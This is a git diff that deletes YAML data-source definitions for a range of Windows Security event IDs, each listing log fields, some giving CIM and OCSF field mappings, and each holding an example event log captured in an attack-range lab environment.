Name='ProcessId'>0x0</Data><Data Name='ProcessName'>-</Data><Data Name='IpAddress'>10.0.1.30</Data><Data Name='IpPort'>59450</Data></EventData></Event>
diff --git a/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4627.yml b/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4627.yml
deleted file mode 100644
index 6263d9b7c3..0000000000
--- a/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4627.yml
+++ /dev/null
@@ -1,81 +0,0 @@
-event_name: Windows Event Log Security 4627
-fields:
-- _time
-- ActivityID
-- Caller_Domain
-- Caller_User_Name
-- Channel
-- Computer
-- Error_Code
-- EventCode
-- EventCountTotal
-- EventData_Xml
-- EventID
-- EventIdx
-- EventRecordID
-- GroupMembership
-- Guid
-- Keywords
-- Level
-- LogonType
-- Logon_ID
-- Logon_Type
-- Name
-- Opcode
-- ProcessID
-- RecordNumber
-- SubjectDomainName
-- SubjectLogonId
-- SubjectUserName
-- SubjectUserSid
-- SystemTime
-- System_Props_Xml
-- TargetDomainName
-- TargetLogonId
-- TargetUserName
-- TargetUserSid
-- Target_Domain
-- Target_User_Name
-- Task
-- ThreadID
-- Version
-- action
-- app
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dest_nt_domain
-- dvc
-- dvc_nt_host
-- event_id
-- eventtype
-- host
-- id
-- index
-- linecount
-- product
-- punct
-- session_id
-- signature_id
-- source
-- sourcetype
-- splunk_server
-- status
-- ta_windows_action
-- tag
-- tag::action
-- tag::app
-- tag::eventtype
-- timeendpos
-- timestartpos
-- user
-- user_group
-- vendor
-- vendor_product
-example_log: <Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/><EventID>4627</EventID><Version>0</Version><Level>0</Level><Task>12554</Task><Opcode>0</Opcode><Keywords>0x8020000000000000</Keywords><TimeCreated SystemTime='2023-10-05T20:02:43.026235200Z'/><EventRecordID>186260</EventRecordID><Correlation ActivityID='{58660170-f720-0003-8b01-665820f7d901}'/><Execution ProcessID='620' ThreadID='4580'/><Channel>Security</Channel><Computer>ar-win-dc.attackrange.local</Computer><Security/></System><EventData><Data Name='SubjectUserSid'>S-1-0-0</Data><Data Name='SubjectUserName'>-</Data><Data Name='SubjectDomainName'>-</Data><Data Name='SubjectLogonId'>0x0</Data><Data Name='TargetUserSid'>S-1-5-21-2442966654-584408786-1775486684-1115</Data><Data Name='TargetUserName'>lowpriv</Data><Data Name='TargetDomainName'>ATTACKRANGE.LOCAL</Data><Data Name='TargetLogonId'>0x1094dbc</Data><Data Name='LogonType'>3</Data><Data Name='EventIdx'>1</Data><Data Name='EventCountTotal'>1</Data><Data Name='GroupMembership'>
diff --git a/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4648.yml b/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4648.yml
deleted file mode 100644
index fb46151c29..0000000000
--- a/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4648.yml
+++ /dev/null
@@ -1,95 +0,0 @@
-event_name: Windows Event Log Security 4648
-fields:
-- _time
-- ActivityID
-- Caller_Domain
-- Caller_User_Name
-- Channel
-- Computer
-- Error_Code
-- EventCode
-- EventData_Xml
-- EventID
-- EventRecordID
-- Guid
-- IpAddress
-- IpPort
-- Keywords
-- Level
-- LogonGuid
-- Logon_ID
-- Name
-- Opcode
-- ProcessID
-- ProcessId
-- RecordNumber
-- Source_Port
-- Source_Workstation
-- SubjectDomainName
-- SubjectLogonId
-- SubjectUserName
-- SubjectUserSid
-- SystemTime
-- System_Props_Xml
-- TargetDomainName
-- TargetInfo
-- TargetLogonGuid
-- TargetServerName
-- TargetUserName
-- Target_Domain
-- Target_Server_Name
-- Target_User_Name
-- Task
-- ThreadID
-- Version
-- action
-- app
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dest_nt_domain
-- dest_nt_host
-- dvc
-- dvc_nt_host
-- event_id
-- eventtype
-- host
-- id
-- index
-- linecount
-- name
-- process_id
-- product
-- punct
-- session_id
-- signature
-- signature_id
-- source
-- sourcetype
-- splunk_server
-- src
-- src_ip
-- src_nt_domain
-- src_nt_host
-- src_port
-- src_user
-- status
-- subject
-- ta_windows_action
-- tag
-- tag::action
-- tag::app
-- tag::eventtype
-- timeendpos
-- timestartpos
-- user
-- user_group
-- vendor
-- vendor_product
-example_log: <Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-A5BA-3E3B0328C30D}'/><EventID>4648</EventID><Version>0</Version><Level>0</Level><Task>12544</Task><Opcode>0</Opcode><Keywords>0x8020000000000000</Keywords><TimeCreated SystemTime='2022-09-08T21:33:47.813673700Z'/><EventRecordID>336567</EventRecordID><Correlation ActivityID='{61CE8B0D-C305-0002-148B-CE6105C3D801}'/><Execution ProcessID='644' ThreadID='4476'/><Channel>Security</Channel><Computer>win-host-mvelazco-02713-447.attackrange.local</Computer><Security/></System><EventData><Data Name='SubjectUserSid'>ATTACKRANGE\REED_LARSEN</Data><Data Name='SubjectUserName'>reed_larsen</Data><Data Name='SubjectDomainName'>ATTACKRANGE</Data><Data Name='SubjectLogonId'>0x1360f2</Data><Data Name='LogonGuid'>{00000000-0000-0000-0000-000000000000}</Data><Data Name='TargetUserName'>STEVE_BRADFORD</Data><Data Name='TargetDomainName'>attackrange.local</Data><Data Name='TargetLogonGuid'>{00000000-0000-0000-0000-000000000000}</Data><Data Name='TargetServerName'>win-dc-mvelazco-02713-392.attackrange.local</Data><Data Name='TargetInfo'>win-dc-mvelazco-02713-392.attackrange.local</Data><Data Name='ProcessId'>0x4</Data><Data Name='ProcessName'></Data><Data Name='IpAddress'>10.0.1.14</Data><Data Name='IpPort'>445</Data></EventData></Event>
diff --git a/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4662.yml b/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4662.yml
deleted file mode 100644
index 06143f4630..0000000000
--- a/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4662.yml
+++ /dev/null
@@ -1,82 +0,0 @@
-event_name: Windows Event Log Security 4662
-fields:
-- _time
-- AccessList
-- AccessMask
-- ActivityID
-- AdditionalInfo
-- Caller_Domain
-- Caller_User_Name
-- Channel
-- Computer
-- Error_Code
-- EventCode
-- EventData_Xml
-- EventID
-- EventRecordID
-- Guid
-- HandleId
-- Keywords
-- Level
-- Logon_ID
-- Name
-- ObjectName
-- ObjectServer
-- ObjectType
-- Opcode
-- OperationType
-- ProcessID
-- Properties
-- RecordNumber
-- SubjectDomainName
-- SubjectLogonId
-- SubjectUserName
-- SubjectUserSid
-- SystemTime
-- System_Props_Xml
-- Task
-- ThreadID
-- Version
-- action
-- app
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dvc
-- dvc_nt_host
-- event_id
-- eventtype
-- host
-- id
-- index
-- linecount
-- name
-- object_file_name
-- object_file_path
-- product
-- punct
-- session_id
-- signature
-- signature_id
-- source
-- sourcetype
-- splunk_server
-- src_nt_domain
-- src_user
-- status
-- subject
-- ta_windows_action
-- tag
-- tag::action
-- tag::eventtype
-- timeendpos
-- timestartpos
-- vendor
-- vendor_product
-example_log: <Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-A5BA-3E3B0328C30D}'/><EventID>4662</EventID><Version>0</Version><Level>0</Level><Task>14080</Task><Opcode>0</Opcode><Keywords>0x8010000000000000</Keywords><TimeCreated SystemTime='2023-02-02T22:41:45.751175400Z'/><EventRecordID>21623198276</EventRecordID><Correlation ActivityID='{7BAD94BA-268A-0000-BB94-AD7B8A26D901}'/><Execution ProcessID='848' ThreadID='7136'/><Channel>Security</Channel><Computer>attack_range_dc</Computer><Security/></System><EventData><Data Name='SubjectUserSid'>attack_range\attacker</Data><Data Name='SubjectUserName'>attacker</Data><Data Name='SubjectDomainName'>attack_range</Data><Data Name='SubjectLogonId'>0x632426dc0</Data><Data Name='ObjectServer'>DS</Data><Data Name='ObjectType'>group</Data><Data Name='ObjectName'>CN=Incoming Forest Trust Builders,CN=Users,DC=Attack_Range</Data><Data Name='OperationType'>Object Access</Data><Data Name='HandleId'>0x0</Data><Data Name='AccessList'>%%7688
diff --git a/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4663.yml b/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4663.yml
deleted file mode 100644
index 3809602d1a..0000000000
--- a/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4663.yml
+++ /dev/null
@@ -1,87 +0,0 @@
-event_name: Windows Event Log Security 4663
-fields:
-- _time
-- AccessList
-- AccessMask
-- Caller_Domain
-- Caller_User_Name
-- Channel
-- Computer
-- Error_Code
-- EventCode
-- EventData_Xml
-- EventID
-- EventRecordID
-- Guid
-- HandleId
-- Keywords
-- Level
-- Logon_ID
-- Name
-- ObjectName
-- ObjectServer
-- ObjectType
-- Opcode
-- ProcessID
-- ProcessId
-- ProcessName
-- RecordNumber
-- ResourceAttributes
-- SubjectDomainName
-- SubjectLogonId
-- SubjectUserName
-- SubjectUserSid
-- SystemTime
-- System_Props_Xml
-- Task
-- ThreadID
-- Version
-- action
-- app
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dvc
-- dvc_nt_host
-- event_id
-- eventtype
-- file_name
-- file_path
-- host
-- id
-- index
-- linecount
-- name
-- object_file_name
-- object_file_path
-- process
-- process_id
-- process_name
-- process_path
-- product
-- punct
-- session_id
-- signature
-- signature_id
-- source
-- sourcetype
-- splunk_server
-- src_nt_domain
-- src_user
-- status
-- subject
-- ta_windows_action
-- tag
-- tag::action
-- tag::eventtype
-- timeendpos
-- timestartpos
-- vendor
-- vendor_product
-example_log: <Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-A5BA-3E3B0328C30D}'/><EventID>4663</EventID><Version>1</Version><Level>0</Level><Task>12800</Task><Opcode>0</Opcode><Keywords>0x8020000000000000</Keywords><TimeCreated SystemTime='2024-02-21T14:08:33.452364300Z'/><EventRecordID>10525869</EventRecordID><Correlation/><Execution ProcessID='4' ThreadID='1212'/><Channel>Security</Channel><Computer>ar-win-2.attackrange.local</Computer><Security/></System><EventData><Data Name='SubjectUserSid'>AR-WIN-2\Administrator</Data><Data Name='SubjectUserName'>Administrator</Data><Data Name='SubjectDomainName'>AR-WIN-2</Data><Data Name='SubjectLogonId'>0x6cfe7</Data><Data Name='ObjectServer'>Security</Data><Data Name='ObjectType'>File</Data><Data Name='ObjectName'>C:\Program Files (x86)\ScreenConnect\App_Extensions\evilapp - Copy (2).aspx</Data><Data Name='HandleId'>0x2220</Data><Data Name='AccessList'>%%4424
diff --git a/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4672.yml b/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4672.yml
deleted file mode 100644
index cbe5628706..0000000000
--- a/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4672.yml
+++ /dev/null
@@ -1,72 +0,0 @@
-event_name: Windows Event Log Security 4672
-fields:
-- _time
-- ActivityID
-- Caller_Domain
-- Caller_User_Name
-- Channel
-- Computer
-- Error_Code
-- EventCode
-- EventData_Xml
-- EventID
-- EventRecordID
-- Guid
-- Keywords
-- Level
-- Logon_ID
-- Name
-- Opcode
-- PrivilegeList
-- ProcessID
-- RecordNumber
-- SubjectDomainName
-- SubjectLogonId
-- SubjectUserName
-- SubjectUserSid
-- SystemTime
-- System_Props_Xml
-- Task
-- ThreadID
-- Version
-- action
-- app
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dvc
-- dvc_nt_host
-- event_id
-- eventtype
-- host
-- id
-- index
-- linecount
-- name
-- product
-- punct
-- session_id
-- signature
-- signature_id
-- source
-- sourcetype
-- splunk_server
-- src_nt_domain
-- src_user
-- status
-- subject
-- ta_windows_action
-- tag
-- tag::action
-- tag::eventtype
-- timeendpos
-- timestartpos
-- vendor
-- vendor_product
-example_log: <Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/><EventID>4672</EventID><Version>0</Version><Level>0</Level><Task>12548</Task><Opcode>0</Opcode><Keywords>0x8020000000000000</Keywords><TimeCreated SystemTime='2023-03-27T18:35:15.439521100Z'/><EventRecordID>148946</EventRecordID><Correlation ActivityID='{a51712a7-60c1-0000-3513-17a5c160d901}'/><Execution ProcessID='624' ThreadID='728'/><Channel>Security</Channel><Computer>ar-win-6.attackrange.local</Computer><Security/></System><EventData><Data Name='SubjectUserSid'>ATTACKRANGE\REED_MORSE</Data><Data Name='SubjectUserName'>REED_MORSE</Data><Data Name='SubjectDomainName'>ATTACKRANGE</Data><Data Name='SubjectLogonId'>0x509b11</Data><Data Name='PrivilegeList'>SeSecurityPrivilege
diff --git a/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4688.yml b/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4688.yml
deleted file mode 100644
index 68bc24ac07..0000000000
--- a/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4688.yml
+++ /dev/null
@@ -1,113 +0,0 @@
-event_name: Windows Event Log Security 4688
-fields:
-  - Caller_Domain
-  - Caller_User_Name
-  - Channel
-  - CommandLine
-  - Computer
-  - Error_Code
-  - EventCode
-  - EventID
-  - EventRecordID
-  - Guid
-  - Keywords
-  - Level
-  - Logon_ID
-  - MandatoryLabel
-  - Name
-  - NewProcessId
-  - NewProcessName
-  - Opcode
-  - ParentProcessName
-  - ProcessID
-  - Process_Command_Line
-  - RecordNumber
-  - SubjectDomainName
-  - SubjectLogonId
-  - SubjectUserName
-  - SubjectUserSid
-  - SystemTime
-  - TargetDomainName
-  - TargetLogonId
-  - TargetUserName
-  - TargetUserSid
-  - Target_Domain
-  - Target_User_Name
-  - Task
-  - ThreadID
-  - TokenElevationType
-  - Token_Elevation_Type
-  - Token_Elevation_Type_id
-  - Version
-  - action
-  - app
-  - dest
-  - dvc
-  - dvc_nt_host
-  - event_id
-  - eventtype
-  - id
-  - name
-  - new_process
-  - new_process_id
-  - new_process_name
-  - parent_process
-  - parent_process_id
-  - parent_process_name
-  - parent_process_path
-  - process
-  - process_command_line_arguments
-  - process_command_line_process
-  - process_exec
-  - process_id
-  - process_name
-  - process_path
-  - product
-  - session_id
-  - signature
-  - signature_id
-  - src_nt_domain
-  - src_user
-  - status
-  - subject
-  - ta_windows_action
-  - tag
-  - user
-  - user_group
-  - vendor
-  - vendor_product
-field_mappings:
-  - data_model: cim
-    data_set: Endpoint.Processes
-    mapping:
-      NewProcessId: Processes.process_id
-      NewProcessName: Processes.process_path
-      NewProcessName|endswith: Processes.process_name
-      Process_Command_Line: Processes.process
-      SubjectUserSid: Processes.user
-      ProcessId: Processes.parent_process_id
-      ParentProcessName: Processes.parent_process_path
-      ParentProcessName|endswith: Processes.parent_process_name
-      Computer: Processes.dest
-  - data_model: ocsf
-    mapping:
-      NewProcessId: process.pid
-      NewProcessName: process.file.path
-      NewProcessName|endswith: process.file.name
-      Process_Command_Line: process.cmd_line
-      SubjectUserSid: actor.user.name
-      ProcessId: actor.process.pid
-      ParentProcessName: actor.process.file.path
-      ParentProcessName|endswith: actor.process.file.name
-      Computer: device.hostname
-convert_to_log_source:
-  - data_source: Sysmon Event ID 1
-    mapping:
-      NewProcessId: ProcessId #New_Process_ID in Hex
-      NewProcessName: Image
-      Process_Command_Line: CommandLine
-      SubjectUserSid: User
-      ProcessId: ParentProcessId
-      ParentProcessName: ParentImage
-      Computer: Computer
-example_log: <Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-A5BA-3E3B0328C30D}'/><EventID>4688</EventID><Version>2</Version><Level>0</Level><Task>13312</Task><Opcode>0</Opcode><Keywords>0x8020000000000000</Keywords><TimeCreated SystemTime='2024-04-23T08:48:30.449376800Z'/><EventRecordID>432820</EventRecordID><Correlation/><Execution ProcessID='4' ThreadID='276'/><Channel>Security</Channel><Computer>ar-win-1</Computer><Security/></System><EventData><Data Name='SubjectUserSid'>NT AUTHORITY\SYSTEM</Data><Data Name='SubjectUserName'>AR-WIN-1$</Data><Data Name='SubjectDomainName'>WORKGROUP</Data><Data Name='SubjectLogonId'>0x3e7</Data><Data Name='NewProcessId'>0xf84</Data><Data Name='NewProcessName'>C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe</Data><Data Name='TokenElevationType'>%%1936</Data><Data Name='ProcessId'>0xb2c</Data><Data Name='CommandLine'>"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2</Data><Data Name='TargetUserSid'>NULL SID</Data><Data Name='TargetUserName'>-</Data><Data Name='TargetDomainName'>-</Data><Data Name='TargetLogonId'>0x0</Data><Data Name='ParentProcessName'>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe</Data><Data Name='MandatoryLabel'>Mandatory Label\System Mandatory Level</Data></EventData></Event>
diff --git a/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4703.yml b/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4703.yml
deleted file mode 100644
index 01f3053449..0000000000
--- a/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4703.yml
+++ /dev/null
@@ -1,91 +0,0 @@
-event_name: Windows Event Log Security 4703
-fields:
-- _time
-- Caller_Domain
-- Caller_User_Name
-- Channel
-- Computer
-- DisabledPrivilegeList
-- EnabledPrivilegeList
-- Error_Code
-- EventCode
-- EventData_Xml
-- EventID
-- EventRecordID
-- Guid
-- Keywords
-- Level
-- Logon_ID
-- Name
-- Opcode
-- ProcessID
-- ProcessId
-- ProcessName
-- RecordNumber
-- SubjectDomainName
-- SubjectLogonId
-- SubjectUserName
-- SubjectUserSid
-- SystemTime
-- System_Props_Xml
-- TargetDomainName
-- TargetLogonId
-- TargetUserName
-- TargetUserSid
-- Target_Domain
-- Target_User_Name
-- Task
-- ThreadID
-- Version
-- action
-- app
-- change_type
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dest_nt_domain
-- dvc
-- dvc_nt_host
-- event_id
-- eventtype
-- host
-- id
-- index
-- linecount
-- object
-- object_attrs
-- object_category
-- object_id
-- process
-- process_id
-- process_name
-- process_path
-- product
-- punct
-- result
-- session_id
-- signature_id
-- source
-- sourcetype
-- splunk_server
-- src_nt_domain
-- src_user
-- src_user_name
-- status
-- ta_windows_action
-- tag
-- tag::eventtype
-- timeendpos
-- timestartpos
-- user
-- user_group
-- user_name
-- vendor
-- vendor_product
-example_log: <Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-A5BA-3E3B0328C30D}'/><EventID>4703</EventID><Version>0</Version><Level>0</Level><Task>13317</Task><Opcode>0</Opcode><Keywords>0x8020000000000000</Keywords><TimeCreated SystemTime='2022-08-31T09:47:43.137598500Z'/><EventRecordID>328761</EventRecordID><Correlation/><Execution ProcessID='4' ThreadID='320'/><Channel>Security</Channel><Computer>win-host-ctus-attack-range-115</Computer><Security/></System><EventData><Data Name='SubjectUserSid'>WIN-HOST-CTUS-A\Administrator</Data><Data Name='SubjectUserName'>Administrator</Data><Data Name='SubjectDomainName'>WIN-HOST-CTUS-A</Data><Data Name='SubjectLogonId'>0x288b91</Data><Data Name='TargetUserSid'>WIN-HOST-CTUS-A\Administrator</Data><Data Name='TargetUserName'>Administrator</Data><Data Name='TargetDomainName'>WIN-HOST-CTUS-A</Data><Data Name='TargetLogonId'>0x288b91</Data><Data Name='ProcessName'>C:\Temp\poc_2\c2_agent.exe</Data><Data Name='ProcessId'>0x570</Data><Data Name='EnabledPrivilegeList'>SeDebugPrivilege</Data><Data Name='DisabledPrivilegeList'>-</Data></EventData></Event>
diff --git a/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4719.yml b/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4719.yml
deleted file mode 100644
index 16863baaf7..0000000000
--- a/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4719.yml
+++ /dev/null
@@ -1,78 +0,0 @@
-event_name: Windows Event Log Security 4719
-fields:
-- _time
-- ActivityID
-- AuditPolicyChanges
-- Caller_Domain
-- Caller_User_Name
-- CategoryId
-- Channel
-- Computer
-- Error_Code
-- EventCode
-- EventData_Xml
-- EventID
-- EventRecordID
-- Guid
-- Keywords
-- Level
-- Logon_ID
-- Name
-- Opcode
-- ProcessID
-- RecordNumber
-- SubcategoryGuid
-- SubcategoryId
-- SubjectDomainName
-- SubjectLogonId
-- SubjectUserName
-- SubjectUserSid
-- SystemTime
-- System_Props_Xml
-- Task
-- ThreadID
-- Version
-- action
-- app
-- change_type
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dvc
-- dvc_nt_host
-- event_id
-- eventtype
-- host
-- id
-- index
-- linecount
-- name
-- object_attrs
-- object_category
-- product
-- punct
-- session_id
-- signature
-- signature_id
-- source
-- sourcetype
-- splunk_server
-- src_nt_domain
-- src_user
-- status
-- subject
-- ta_windows_action
-- tag
-- tag::action
-- tag::eventtype
-- timeendpos
-- timestartpos
-- vendor
-- vendor_product
-example_log: <Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-A5BA-3E3B0328C30D}'/><EventID>4719</EventID><Version>0</Version><Level>0</Level><Task>13568</Task><Opcode>0</Opcode><Keywords>0x8020000000000000</Keywords><TimeCreated SystemTime='2022-11-03T00:02:53.722907800Z'/><EventRecordID>353597</EventRecordID><Correlation ActivityID='{03951765-EF14-0000-6E17-950314EFD801}'/><Execution ProcessID='644' ThreadID='848'/><Channel>Security</Channel><Computer>ar-win-dc.attackrange.local</Computer><Security/></System><EventData><Data Name='SubjectUserSid'>NT AUTHORITY\SYSTEM</Data><Data Name='SubjectUserName'>AR-WIN-DC$</Data><Data Name='SubjectDomainName'>ATTACKRANGE</Data><Data Name='SubjectLogonId'>0x3e7</Data><Data Name='CategoryId'>%%8276</Data><Data Name='SubcategoryId'>%%13312</Data><Data Name='SubcategoryGuid'>{0CCE922B-69AE-11D9-BED3-505054503030}</Data><Data Name='AuditPolicyChanges'>%%8448, %%8450</Data></EventData></Event>
diff --git a/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4724.yml b/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4724.yml
deleted file mode 100644
index af5ec16c03..0000000000
--- a/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4724.yml
+++ /dev/null
@@ -1,87 +0,0 @@
-event_name: Windows Event Log Security 4724
-fields:
-- _time
-- Caller_Domain
-- Caller_User_Name
-- CategoryString
-- Channel
-- Computer
-- Error_Code
-- EventCode
-- EventData_Xml
-- EventID
-- EventRecordID
-- Guid
-- Keywords
-- Level
-- Logon_ID
-- Name
-- Opcode
-- ProcessID
-- RecordNumber
-- SubjectDomainName
-- SubjectLogonId
-- SubjectUserName
-- SubjectUserSid
-- SystemTime
-- System_Props_Xml
-- TargetDomainName
-- TargetSid
-- TargetUserName
-- Target_Domain
-- Target_User_Name
-- Task
-- ThreadID
-- Version
-- action
-- app
-- change_type
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dest_nt_domain
-- dvc
-- dvc_nt_host
-- event_id
-- eventtype
-- host
-- id
-- index
-- linecount
-- name
-- object
-- object_attrs
-- object_category
-- object_id
-- product
-- punct
-- result
-- session_id
-- signature
-- signature_id
-- source
-- sourcetype
-- splunk_server
-- src_nt_domain
-- src_user
-- src_user_name
-- status
-- subject
-- ta_windows_action
-- ta_windows_security_CategoryString
-- tag
-- tag::eventtype
-- timeendpos
-- timestartpos
-- user
-- user_group
-- user_name
-- vendor
-- vendor_product
-example_log: <Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/><EventID>4724</EventID><Version>0</Version><Level>0</Level><Task>13824</Task><Opcode>0</Opcode><Keywords>0x8020000000000000</Keywords><TimeCreated SystemTime='2024-02-21T18:02:22.774396900Z'/><EventRecordID>276779</EventRecordID><Correlation/><Execution ProcessID='612' ThreadID='6844'/><Channel>Security</Channel><Computer>ar-win-dc.attackrange.local</Computer><Security/></System><EventData><Data Name='TargetUserName'>TRUMAN_CLEMENTS</Data><Data Name='TargetDomainName'>ATTACKRANGE</Data><Data Name='TargetSid'>ATTACKRANGE\TRUMAN_CLEMENTS</Data><Data Name='SubjectUserSid'>ATTACKRANGE\Administrator</Data><Data Name='SubjectUserName'>Administrator</Data><Data Name='SubjectDomainName'>ATTACKRANGE</Data><Data Name='SubjectLogonId'>0x592d1</Data></EventData></Event>
diff --git a/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4725.yml b/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4725.yml
deleted file mode 100644
index 67740b57e0..0000000000
--- a/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4725.yml
+++ /dev/null
@@ -1,87 +0,0 @@
-event_name: Windows Event Log Security 4725
-fields:
-- _time
-- Caller_Domain
-- Caller_User_Name
-- CategoryString
-- Channel
-- Computer
-- Error_Code
-- EventCode
-- EventData_Xml
-- EventID
-- EventRecordID
-- Guid
-- Keywords
-- Level
-- Logon_ID
-- Name
-- Opcode
-- ProcessID
-- RecordNumber
-- SubjectDomainName
-- SubjectLogonId
-- SubjectUserName
-- SubjectUserSid
-- SystemTime
-- System_Props_Xml
-- TargetDomainName
-- TargetSid
-- TargetUserName
-- Target_Domain
-- Target_User_Name
-- Task
-- ThreadID
-- Version
-- action
-- app
-- change_type
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dest_nt_domain
-- dvc
-- dvc_nt_host
-- event_id
-- eventtype
-- host
-- id
-- index
-- linecount
-- name
-- object
-- object_attrs
-- object_category
-- object_id
-- product
-- punct
-- result
-- session_id
-- signature
-- signature_id
-- source
-- sourcetype
-- splunk_server
-- src_nt_domain
-- src_user
-- src_user_name
-- status
-- subject
-- ta_windows_action
-- ta_windows_security_CategoryString
-- tag
-- tag::eventtype
-- timeendpos
-- timestartpos
-- user
-- user_group
-- user_name
-- vendor
-- vendor_product
-example_log: <Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/><EventID>4725</EventID><Version>0</Version><Level>0</Level><Task>13824</Task><Opcode>0</Opcode><Keywords>0x8020000000000000</Keywords><TimeCreated SystemTime='2024-02-21T19:20:19.727858200Z'/><EventRecordID>278771</EventRecordID><Correlation/><Execution ProcessID='612' ThreadID='3184'/><Channel>Security</Channel><Computer>ar-win-dc.attackrange.local</Computer><Security/></System><EventData><Data Name='TargetUserName'>WILFORD_SUTTON</Data><Data Name='TargetDomainName'>ATTACKRANGE</Data><Data Name='TargetSid'>ATTACKRANGE\WILFORD_SUTTON</Data><Data Name='SubjectUserSid'>ATTACKRANGE\Administrator</Data><Data Name='SubjectUserName'>Administrator</Data><Data Name='SubjectDomainName'>ATTACKRANGE</Data><Data Name='SubjectLogonId'>0x592d1</Data></EventData></Event>
diff --git a/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4726.yml b/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4726.yml
deleted file mode 100644
index fef4ed448a..0000000000
--- a/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4726.yml
+++ /dev/null
@@ -1,88 +0,0 @@
-event_name: Windows Event Log Security 4726
-fields:
-- _time
-- Caller_Domain
-- Caller_User_Name
-- CategoryString
-- Channel
-- Computer
-- Error_Code
-- EventCode
-- EventData_Xml
-- EventID
-- EventRecordID
-- Guid
-- Keywords
-- Level
-- Logon_ID
-- Name
-- Opcode
-- PrivilegeList
-- ProcessID
-- RecordNumber
-- SubjectDomainName
-- SubjectLogonId
-- SubjectUserName
-- SubjectUserSid
-- SystemTime
-- System_Props_Xml
-- TargetDomainName
-- TargetSid
-- TargetUserName
-- Target_Domain
-- Target_User_Name
-- Task
-- ThreadID
-- Version
-- action
-- app
-- change_type
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dest_nt_domain
-- dvc
-- dvc_nt_host
-- event_id
-- eventtype
-- host
-- id
-- index
-- linecount
-- name
-- object
-- object_attrs
-- object_category
-- object_id
-- product
-- punct
-- result
-- session_id
-- signature
-- signature_id
-- source
-- sourcetype
-- splunk_server
-- src_nt_domain
-- src_user
-- src_user_name
-- status
-- subject
-- ta_windows_action
-- ta_windows_security_CategoryString
-- tag
-- tag::eventtype
-- timeendpos
-- timestartpos
-- user
-- user_group
-- user_name
-- vendor
-- vendor_product
